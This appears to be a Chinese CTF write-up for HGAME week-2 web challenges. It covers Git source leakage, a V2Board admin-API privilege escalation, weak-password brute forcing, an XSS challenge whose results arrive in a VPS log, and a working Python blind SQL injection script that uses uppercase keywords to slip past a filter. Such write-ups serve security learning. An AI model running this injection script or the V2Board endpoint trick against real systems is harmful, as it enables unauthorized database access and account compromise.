Git LeakageGithack一波带走,下载得到flag
v2board搜索得知V2Board存在越权漏洞,随便注册个账号拿到authorization
访问/api/v1/admin/user/fetch?pageSize=10¤t=1
拿到token值,hgame{39d580e71705f6abac9a414def74c466}
Search Commodity弱口令爆破得到密码admin123,登录进去是一个搜索框,很明显是sql注入,bp构造一个search_id=1$select$*2,fuzz一下,发现好多都被过滤为空,这里给出部分
这里发现大写能够绕过过滤,我们写一个盲注脚本- import requests
- import string
- strs = string.printable
- headers = {
- 'Cookie': 'SESSION=MTY3MzY2MDExM3xEdi1CQkFFQ180SUFBUkFCRUFBQUpQLUNBQUVHYzNSeWFXNW5EQVlBQkhWelpYSUdjM1J5YVc1bkRBZ0FCblZ6WlhJd01RPT18adCvaHER65QoUwkQqK1elOtFjUAT9stHSgpZfPrUWik='
- }
- flag = ''
- def attack(url):
- global flag
- for i in range(1, 100):
- for j in strs:
- if j == '%':
- continue
- tmp = ord(j)
- payload = 'DATABASE()'
- payload1 = 'SELECT(GROUP_CONCAT(TABLE_NAME))FROM(INFORMATION_SCHEMA.TABLES)WHERE(TABLE_SCHEMA)like(DATABASE())'
- payload2 = "SELECT(GROUP_CONCAT(COLUMN_NAME))FROM(INFORMATION_SCHEMA.COLUMNS)WHERE(TABLE_NAME)like('5ecret15here')"
- payload3 = 'SELECT(f14gggg1shere)FROM(5ecret15here)'
- data = {
- 'search_id': f"0||((ascii(substr(({payload3}),{i},1)))like({tmp}))"
- }
- r = requests.post(url, data=data, headers=headers)
- if 'hard disk' in r.text:
- flag += j
- print(flag)
- break
- if flag.endswith('}'):
- break
- if __name__ == '__main__':
- url = 'http://week-2.hgame.lwsec.cn:32034/search'
- attack(url)
我们写一个xhr请求,让本地来访问就能成功伪造ip,得到true flag
利用在线xss_platform,把代码丢里头,Box shadow里填入xss攻击payload,注意这里要闭合下标签,这里有个坑,得先preview一下再share,才能触发本地访问,不知道是不是就我一个人有这个问题
最后我们在vps的web日志里找到请求信息,本想直接输出来着,但没成功
jwt解密得到flag
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |
